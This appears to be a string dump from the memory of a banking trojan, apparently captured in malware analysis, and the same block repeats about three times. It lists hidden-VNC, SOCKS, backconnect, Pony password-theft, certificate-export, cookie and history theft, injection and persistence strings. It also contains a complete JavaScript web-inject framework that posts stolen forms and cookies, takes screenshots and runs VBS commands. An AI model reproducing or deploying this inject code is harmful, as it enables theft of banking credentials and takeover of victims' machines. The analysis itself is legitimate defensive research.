&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}{0AE625D1-61C9-42E5-AEF4-7154387F4248}{6B376189-11A2-4F58-96A6-001E03862004}\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}D{0AE625D1-61C9-42E5-AEF4-7154387F4248}{23DC640D-793E-4D8F-955D-2E6215F37B91}U{687F46D2-25E5-43B6-BD95-68B725074F1D}546B5A02-5978-4B96-802A-4C514A243A08
7%7.777@7
1#1-161@1|1
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
TPAutoConnSvc.exe_1676_rwx_00840000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
TPAutoConnect.exe_2160_rwx_00390000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
TPAutoConnect.exe_2160_rwx_01A70000_00077000:
.text
`.rdata
@.data
.reloc
HHt.HHt
hu2.iuj
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
